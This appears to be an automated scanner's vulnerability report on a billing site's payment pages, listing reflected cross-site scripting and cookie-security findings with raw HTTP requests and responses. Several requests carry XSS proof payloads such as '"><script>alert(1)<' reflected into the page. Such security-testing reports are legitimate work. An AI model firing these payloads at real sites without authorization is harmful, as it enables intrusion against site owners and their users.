1. Cross-site scripting (reflected)
1.1. https://billing.vs.com/payment/ [mp_code parameter]
1.2. https://billing.vs.com/payment/ [mp_code parameter]
1.3. https://billing.vs.com/payment/ [service parameter]
1.4. https://billing.vs.com/payment/ [sitekey parameter]
1.5. https://billing.vs.com/payment/ [sitekey parameter]
1.6. https://billing.vs.com/payment/ [username parameter]
1.7. https://billing.vs.com/payment/ [username parameter]
1.8. https://billing.vs.com/payment/index.php [sitekey parameter]
1.9. https://billing.vs.com/payment/index.php [sitekey parameter]
2. SSL cookie without secure flag set
2.1. https://billing.vs.com/payment/
2.2. https://billing.vs.com/payment/
2.3. https://billing.vs.com/payment/
2.4. https://billing.vs.com/payment/index.php
3.1. https://billing.vs.com/payment/
3.2. https://billing.vs.com/payment/
3.3. https://billing.vs.com/payment/index.php
4. Cookie without HttpOnly flag set
4.1. https://billing.vs.com/payment/
4.2. https://billing.vs.com/payment/
4.3. https://billing.vs.com/payment/
4.4. https://billing.vs.com/payment/index.php
5. Password field with autocomplete enabled
5.1. https://billing.vs.com/payment/
5.2. https://billing.vs.com/payment/
5.3. https://billing.vs.com/payment/
5.4. https://billing.vs.com/payment/index.php
6. Cookie scoped to parent domain
6.1. https://billing.vs.com/payment/
6.2. https://billing.vs.com/payment/index.php
7. Cross-domain Referer leakage
7.1. https://billing.vs.com/payment/
7.2. https://billing.vs.com/payment/index.php
Severity: | High |
Confidence: | Certain |
Host: | https://billing.vs.com |
Path: | /payment/ |
GET /payment/?mp_code=cqiue9ab4"%3balert(1)/ Host: billing.vs.com Connection: keep-alive Referer: http://vividlive.com/ Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Fri, 31 Dec 2010 15:06:04 GMT Server: Apache Set-Cookie: PHPSESSID=bpuqh7t38j Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: sitekey=vivid; expires=Fri, 07-Jan-2011 15:06:04 GMT; path=/; domain=.vs.com Set-Cookie: service=girls; expires=Sat, 31-Dec-2011 15:06:04 GMT; path=/; domain=.vs.com Set-Cookie: mp_code=cqiue9ab4%22 Set-Cookie: source_code=default; expires=Fri, 07-Jan-2011 15:06:04 GMT; path=/; domain=.vs.com Set-Cookie: product_type=live; expires=Fri, 07-Jan-2011 15:06:04 GMT; path=/; domain=.vs.com Vary: Accept-Encoding Keep-Alive: timeout=15, max=1000 Connection: Keep-Alive Content-Type: text/html Content-Length: 29890 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... $('#addAccount').click window.location="/payment }); }); </script> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://billing.vs.com |
Path: | /payment/ |
GET /payment/?mp_code=cqiu69c58"><script>alert(1)< Host: billing.vs.com Connection: keep-alive Referer: http://vividlive.com/ Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Fri, 31 Dec 2010 15:06:02 GMT Server: Apache Set-Cookie: PHPSESSID=qidtpi15hq Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: sitekey=vivid; expires=Fri, 07-Jan-2011 15:06:02 GMT; path=/; domain=.vs.com Set-Cookie: service=girls; expires=Sat, 31-Dec-2011 15:06:02 GMT; path=/; domain=.vs.com Set-Cookie: mp_code=cqiu69c58%22%3E Set-Cookie: source_code=default; expires=Fri, 07-Jan-2011 15:06:02 GMT; path=/; domain=.vs.com Set-Cookie: product_type=live; expires=Fri, 07-Jan-2011 15:06:02 GMT; path=/; domain=.vs.com Vary: Accept-Encoding Keep-Alive: timeout=15, max=1000 Connection: Keep-Alive Content-Type: text/html Content-Length: 29980 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <form id="payment_form" method="post" action="/payment/index ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | https://billing.vs.com |
Path: | /payment/ |
GET /payment/?mp_code=cqiu Host: billing.vs.com Connection: keep-alive Referer: http://vividlive.com/ Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Fri, 31 Dec 2010 15:06:11 GMT Server: Apache Set-Cookie: PHPSESSID=tgbgut8qos Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: sitekey=vivid; expires=Fri, 07-Jan-2011 15:06:11 GMT; path=/; domain=.vs.com Set-Cookie: service=girlsec6e3%22%3E Set-Cookie: mp_code=cqiu; expires=Sun, 30-Jan-2011 15:06:11 GMT; path=/; domain=.vs.com Set-Cookie: source_code=default; expires=Fri, 07-Jan-2011 15:06:11 GMT; path=/; domain=.vs.com Set-Cookie: product_type=live; expires=Fri, 07-Jan-2011 15:06:11 GMT; path=/; domain=.vs.com Vary: Accept-Encoding Keep-Alive: timeout=15, max=1000 Connection: Keep-Alive Content-Type: text/html Content-Length: 29848 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <form id="payment_form" method="post" action="/payment/index ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://billing.vs.com |
Path: | /payment/ |
GET /payment/?mp_code=cqiu Host: billing.vs.com Connection: keep-alive Referer: http://vividlive.com/ Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Fri, 31 Dec 2010 15:06:53 GMT Server: Apache Set-Cookie: PHPSESSID=ojvdn4dre6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: sitekey=vividd834f%22%3E Set-Cookie: service=girls; expires=Sat, 31-Dec-2011 15:06:53 GMT; path=/; domain=.vs.com Set-Cookie: mp_code=cqiu; expires=Sun, 30-Jan-2011 15:06:53 GMT; path=/; domain=.vs.com Set-Cookie: source_code=default; expires=Fri, 07-Jan-2011 15:06:53 GMT; path=/; domain=.vs.com Set-Cookie: product_type=live; expires=Fri, 07-Jan-2011 15:06:53 GMT; path=/; domain=.vs.com Vary: Accept-Encoding Keep-Alive: timeout=15, max=1000 Connection: Keep-Alive Content-Type: text/html Content-Length: 30118 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <link rel="stylesheet" type="text/css" href="/css/skins/vividd834f"><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://billing.vs.com |
Path: | /payment/ |
GET /payment/?mp_code=cqiu Host: billing.vs.com Connection: keep-alive Referer: http://vividlive.com/ Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Fri, 31 Dec 2010 15:06:54 GMT Server: Apache Set-Cookie: PHPSESSID=i83mm6qrc1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: sitekey=vivid84923%22 Set-Cookie: service=girls; expires=Sat, 31-Dec-2011 15:06:54 GMT; path=/; domain=.vs.com Set-Cookie: mp_code=cqiu; expires=Sun, 30-Jan-2011 15:06:54 GMT; path=/; domain=.vs.com Set-Cookie: source_code=default; expires=Fri, 07-Jan-2011 15:06:54 GMT; path=/; domain=.vs.com Set-Cookie: product_type=live; expires=Fri, 07-Jan-2011 15:06:54 GMT; path=/; domain=.vs.com Vary: Accept-Encoding Keep-Alive: timeout=15, max=1000 Connection: Keep-Alive Content-Type: text/html Content-Length: 29983 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... $(document).ready $('#addAccount').click window.location="/payment }); }); </script> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://billing.vs.com |
Path: | /payment/ |
GET /payment/?form_type=new Host: billing.vs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: source_code=default; mp_code=cqiu; service=girls; PHPSESSID=38aiuoljff |
HTTP/1.1 200 OK Date: Fri, 31 Dec 2010 15:06:10 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: sitekey=vivid; expires=Fri, 07-Jan-2011 15:06:10 GMT; path=/; domain=.vs.com Set-Cookie: service=girls; expires=Sat, 31-Dec-2011 15:06:10 GMT; path=/; domain=.vs.com Set-Cookie: mp_code=cqiu; expires=Sun, 30-Jan-2011 15:06:10 GMT; path=/; domain=.vs.com Set-Cookie: source_code=default; expires=Fri, 07-Jan-2011 15:06:10 GMT; path=/; domain=.vs.com Set-Cookie: product_type=live; expires=Fri, 07-Jan-2011 15:06:10 GMT; path=/; domain=.vs.com Set-Cookie: use_new_tpls=1; expires=Fri, 07-Jan-2011 15:06:10 GMT; path=/; domain=.vs.com Set-Cookie: pa_id=50587289; path=/payment/; domain=.billing.vs.com Connection: close Content-Type: text/html Content-Length: 10161 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... ipt language="javascript" type="text/javascript"> $(document).ready $('#addAccount').click window.location="/payment ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://billing.vs.com |
Path: | /payment/ |
GET /payment/?form_type=new Host: billing.vs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: source_code=default; mp_code=cqiu; service=girls; PHPSESSID=38aiuoljff |
HTTP/1.1 200 OK Date: Fri, 31 Dec 2010 15:06:09 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: sitekey=vivid; expires=Fri, 07-Jan-2011 15:06:09 GMT; path=/; domain=.vs.com Set-Cookie: service=girls; expires=Sat, 31-Dec-2011 15:06:09 GMT; path=/; domain=.vs.com Set-Cookie: mp_code=cqiu; expires=Sun, 30-Jan-2011 15:06:09 GMT; path=/; domain=.vs.com Set-Cookie: source_code=default; expires=Fri, 07-Jan-2011 15:06:09 GMT; path=/; domain=.vs.com Set-Cookie: product_type=live; expires=Fri, 07-Jan-2011 15:06:09 GMT; path=/; domain=.vs.com Set-Cookie: use_new_tpls=1; expires=Fri, 07-Jan-2011 15:06:09 GMT; path=/; domain=.vs.com Set-Cookie: pa_id=50587285; path=/payment/; domain=.billing.vs.com Connection: close Content-Type: text/html Content-Length: 10193 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <input type="text" id="username" name="ITEM[username]" size="15" maxlength="32" tabindex="1" value="e0049"><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://billing.vs.com |
Path: | /payment/index.php |
GET /payment/index.php Host: billing.vs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: source_code=default; mp_code=cqiu; service=girls; PHPSESSID=38aiuoljff |
HTTP/1.1 200 OK Date: Fri, 31 Dec 2010 15:06:08 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: sitekey=vivid8f646%22 Set-Cookie: service=girls; expires=Sat, 31-Dec-2011 15:06:08 GMT; path=/; domain=.vs.com Set-Cookie: mp_code=cqiu; expires=Sun, 30-Jan-2011 15:06:08 GMT; path=/; domain=.vs.com Set-Cookie: source_code=default; expires=Fri, 07-Jan-2011 15:06:08 GMT; path=/; domain=.vs.com Set-Cookie: product_type=live; expires=Fri, 07-Jan-2011 15:06:08 GMT; path=/; domain=.vs.com Set-Cookie: use_new_tpls=1; expires=Fri, 07-Jan-2011 15:06:08 GMT; path=/; domain=.vs.com Connection: close Content-Type: text/html Content-Length: 30097 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... $(document).ready $('#addAccount').click window.location="/payment }); }); </script> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://billing.vs.com |
Path: | /payment/index.php |
GET /payment/index.php Host: billing.vs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: source_code=default; mp_code=cqiu; service=girls; PHPSESSID=38aiuoljff |
HTTP/1.1 200 OK Date: Fri, 31 Dec 2010 15:06:07 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: sitekey=vivid1a406%22%3E Set-Cookie: service=girls; expires=Sat, 31-Dec-2011 15:06:07 GMT; path=/; domain=.vs.com Set-Cookie: mp_code=cqiu; expires=Sun, 30-Jan-2011 15:06:07 GMT; path=/; domain=.vs.com Set-Cookie: source_code=default; expires=Fri, 07-Jan-2011 15:06:07 GMT; path=/; domain=.vs.com Set-Cookie: product_type=live; expires=Fri, 07-Jan-2011 15:06:07 GMT; path=/; domain=.vs.com Set-Cookie: use_new_tpls=1; expires=Fri, 07-Jan-2011 15:06:07 GMT; path=/; domain=.vs.com Connection: close Content-Type: text/html Content-Length: 30232 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <link rel="stylesheet" type="text/css" href="/css/skins/vivid1a406"><script>alert(1)< ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | https://billing.vs.com |
Path: | /payment/ |
GET /payment/?mp_code=cqiu Host: billing.vs.com Connection: keep-alive Referer: http://vividlive.com/ Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Fri, 31 Dec 2010 15:05:19 GMT Server: Apache Set-Cookie: PHPSESSID=38aiuoljff Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: sitekey=vivid; expires=Fri, 07-Jan-2011 15:05:19 GMT; path=/; domain=.vs.com Set-Cookie: service=girls; expires=Sat, 31-Dec-2011 15:05:19 GMT; path=/; domain=.vs.com Set-Cookie: mp_code=cqiu; expires=Sun, 30-Jan-2011 15:05:19 GMT; path=/; domain=.vs.com Set-Cookie: source_code=default; expires=Fri, 07-Jan-2011 15:05:19 GMT; path=/; domain=.vs.com Set-Cookie: product_type=live; expires=Fri, 07-Jan-2011 15:05:19 GMT; path=/; domain=.vs.com Vary: Accept-Encoding Keep-Alive: timeout=15, max=1000 Connection: Keep-Alive Content-Type: text/html Content-Length: 29722 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://billing.vs.com |
Path: | /payment/ |
GET /payment/?form_type=new Host: billing.vs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: source_code=default; mp_code=cqiu; service=girls; PHPSESSID=38aiuoljff |
HTTP/1.1 200 OK Date: Fri, 31 Dec 2010 15:05:47 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: sitekey=vivid; expires=Fri, 07-Jan-2011 15:05:47 GMT; path=/; domain=.vs.com Set-Cookie: service=girls; expires=Sat, 31-Dec-2011 15:05:47 GMT; path=/; domain=.vs.com Set-Cookie: mp_code=cqiu; expires=Sun, 30-Jan-2011 15:05:47 GMT; path=/; domain=.vs.com Set-Cookie: source_code=default; expires=Fri, 07-Jan-2011 15:05:47 GMT; path=/; domain=.vs.com Set-Cookie: product_type=live; expires=Fri, 07-Jan-2011 15:05:47 GMT; path=/; domain=.vs.com Set-Cookie: use_new_tpls=1; expires=Fri, 07-Jan-2011 15:05:47 GMT; path=/; domain=.vs.com Set-Cookie: pa_id=50587201; path=/payment/; domain=.billing.vs.com Connection: close Content-Type: text/html Content-Length: 10107 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://billing.vs.com |
Path: | /payment/ |
GET /payment/?mp_code=cqiu Host: billing.vs.com Connection: keep-alive Referer: http://vividlive.com/ Cache-Control: max-age=0 Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=38aiuoljff |
HTTP/1.1 500 Internal Server Error Date: Fri, 31 Dec 2010 15:06:45 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: sitekey=vivid; expires=Fri, 07-Jan-2011 15:06:45 GMT; path=/; domain=.vs.com Set-Cookie: service=girls; expires=Sat, 31-Dec-2011 15:06:45 GMT; path=/; domain=.vs.com Set-Cookie: mp_code=cqiu; expires=Sun, 30-Jan-2011 15:06:45 GMT; path=/; domain=.vs.com Set-Cookie: source_code=default; expires=Fri, 07-Jan-2011 15:06:45 GMT; path=/; domain=.vs.com Set-Cookie: product_type=live; expires=Fri, 07-Jan-2011 15:06:45 GMT; path=/; domain=.vs.com Set-Cookie: use_new_tpls=1c2a76%22 Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 0 |
Severity: | Information |
Confidence: | Certain |
Host: | https://billing.vs.com |
Path: | /payment/index.php |
GET /payment/index.php Host: billing.vs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: source_code=default; use_new_tpls=1c2a76%22 |
HTTP/1.1 500 Internal Server Error Date: Fri, 31 Dec 2010 15:11:20 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: sitekey=vivid; expires=Fri, 07-Jan-2011 15:11:20 GMT; path=/; domain=.vs.com Set-Cookie: service=girls; expires=Sat, 31-Dec-2011 15:11:20 GMT; path=/; domain=.vs.com Set-Cookie: mp_code=cqiu; expires=Sun, 30-Jan-2011 15:11:20 GMT; path=/; domain=.vs.com Set-Cookie: source_code=default; expires=Fri, 07-Jan-2011 15:11:20 GMT; path=/; domain=.vs.com Set-Cookie: product_type=live; expires=Fri, 07-Jan-2011 15:11:20 GMT; path=/; domain=.vs.com Set-Cookie: use_new_tpls=b8a4e58 Connection: close Content-Type: text/html Content-Length: 0 |
Severity: | Medium |
Confidence: | Firm |
Host: | https://billing.vs.com |
Path: | /payment/ |
GET /payment/?form_type=new Host: billing.vs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: source_code=default; mp_code=cqiu; service=girls; PHPSESSID=38aiuoljff |
HTTP/1.1 200 OK Date: Fri, 31 Dec 2010 15:05:47 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: sitekey=vivid; expires=Fri, 07-Jan-2011 15:05:47 GMT; path=/; domain=.vs.com Set-Cookie: service=girls; expires=Sat, 31-Dec-2011 15:05:47 GMT; path=/; domain=.vs.com Set-Cookie: mp_code=cqiu; expires=Sun, 30-Jan-2011 15:05:47 GMT; path=/; domain=.vs.com Set-Cookie: source_code=default; expires=Fri, 07-Jan-2011 15:05:47 GMT; path=/; domain=.vs.com Set-Cookie: product_type=live; expires=Fri, 07-Jan-2011 15:05:47 GMT; path=/; domain=.vs.com Set-Cookie: use_new_tpls=1; expires=Fri, 07-Jan-2011 15:05:47 GMT; path=/; domain=.vs.com Set-Cookie: pa_id=50587201; path=/payment/; domain=.billing.vs.com Connection: close Content-Type: text/html Content-Length: 10107 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | https://billing.vs.com |
Path: | /payment/ |
GET /payment/?form_type=new Host: billing.vs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: source_code=default; mp_code=cqiu; service=girls; PHPSESSID=38aiuoljff |
HTTP/1.1 200 OK Date: Fri, 31 Dec 2010 15:05:47 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: sitekey=vivid; expires=Fri, 07-Jan-2011 15:05:47 GMT; path=/; domain=.vs.com Set-Cookie: service=girls; expires=Sat, 31-Dec-2011 15:05:47 GMT; path=/; domain=.vs.com Set-Cookie: mp_code=cqiu; expires=Sun, 30-Jan-2011 15:05:47 GMT; path=/; domain=.vs.com Set-Cookie: source_code=default; expires=Fri, 07-Jan-2011 15:05:47 GMT; path=/; domain=.vs.com Set-Cookie: product_type=live; expires=Fri, 07-Jan-2011 15:05:47 GMT; path=/; domain=.vs.com Set-Cookie: use_new_tpls=1; expires=Fri, 07-Jan-2011 15:05:47 GMT; path=/; domain=.vs.com Set-Cookie: pa_id=50587201; path=/payment/; domain=.billing.vs.com Connection: close Content-Type: text/html Content-Length: 10107 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <div class="text2"> <a class="link2" href="http://www ...[SNIP]... <br/>--> <a class="link2" href="/payment/index.php ...[SNIP]... <br />Use the <a class="link2" a href="/payment/?form_type ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | https://billing.vs.com |
Path: | /payment/index.php |
GET /payment/index.php Host: billing.vs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: source_code=default; mp_code=cqiu; service=girls; PHPSESSID=38aiuoljff |
HTTP/1.1 200 OK Date: Fri, 31 Dec 2010 15:05:48 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: sitekey=vivid; expires=Fri, 07-Jan-2011 15:05:48 GMT; path=/; domain=.vs.com Set-Cookie: service=girls; expires=Sat, 31-Dec-2011 15:05:48 GMT; path=/; domain=.vs.com Set-Cookie: mp_code=cqiu; expires=Sun, 30-Jan-2011 15:05:48 GMT; path=/; domain=.vs.com Set-Cookie: source_code=default; expires=Fri, 07-Jan-2011 15:05:48 GMT; path=/; domain=.vs.com Set-Cookie: product_type=live; expires=Fri, 07-Jan-2011 15:05:48 GMT; path=/; domain=.vs.com Set-Cookie: use_new_tpls=1; expires=Fri, 07-Jan-2011 15:05:48 GMT; path=/; domain=.vs.com Connection: close Content-Type: text/html Content-Length: 29836 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
Severity: | Low |
Confidence: | Firm |
Host: | https://billing.vs.com |
Path: | /payment/ |
GET /payment/?mp_code=cqiu Host: billing.vs.com Connection: keep-alive Referer: http://vividlive.com/ Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Fri, 31 Dec 2010 15:05:19 GMT Server: Apache Set-Cookie: PHPSESSID=38aiuoljff Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: sitekey=vivid; expires=Fri, 07-Jan-2011 15:05:19 GMT; path=/; domain=.vs.com Set-Cookie: service=girls; expires=Sat, 31-Dec-2011 15:05:19 GMT; path=/; domain=.vs.com Set-Cookie: mp_code=cqiu; expires=Sun, 30-Jan-2011 15:05:19 GMT; path=/; domain=.vs.com Set-Cookie: source_code=default; expires=Fri, 07-Jan-2011 15:05:19 GMT; path=/; domain=.vs.com Set-Cookie: product_type=live; expires=Fri, 07-Jan-2011 15:05:19 GMT; path=/; domain=.vs.com Vary: Accept-Encoding Keep-Alive: timeout=15, max=1000 Connection: Keep-Alive Content-Type: text/html Content-Length: 29722 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://billing.vs.com |
Path: | /payment/ |
GET /payment/?form_type=new Host: billing.vs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: source_code=default; mp_code=cqiu; service=girls; PHPSESSID=38aiuoljff |
HTTP/1.1 200 OK Date: Fri, 31 Dec 2010 15:05:47 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: sitekey=vivid; expires=Fri, 07-Jan-2011 15:05:47 GMT; path=/; domain=.vs.com Set-Cookie: service=girls; expires=Sat, 31-Dec-2011 15:05:47 GMT; path=/; domain=.vs.com Set-Cookie: mp_code=cqiu; expires=Sun, 30-Jan-2011 15:05:47 GMT; path=/; domain=.vs.com Set-Cookie: source_code=default; expires=Fri, 07-Jan-2011 15:05:47 GMT; path=/; domain=.vs.com Set-Cookie: product_type=live; expires=Fri, 07-Jan-2011 15:05:47 GMT; path=/; domain=.vs.com Set-Cookie: use_new_tpls=1; expires=Fri, 07-Jan-2011 15:05:47 GMT; path=/; domain=.vs.com Set-Cookie: pa_id=50587201; path=/payment/; domain=.billing.vs.com Connection: close Content-Type: text/html Content-Length: 10107 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://billing.vs.com |
Path: | /payment/ |
GET /payment/?mp_code=cqiu Host: billing.vs.com Connection: keep-alive Referer: http://vividlive.com/ Cache-Control: max-age=0 Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=38aiuoljff |
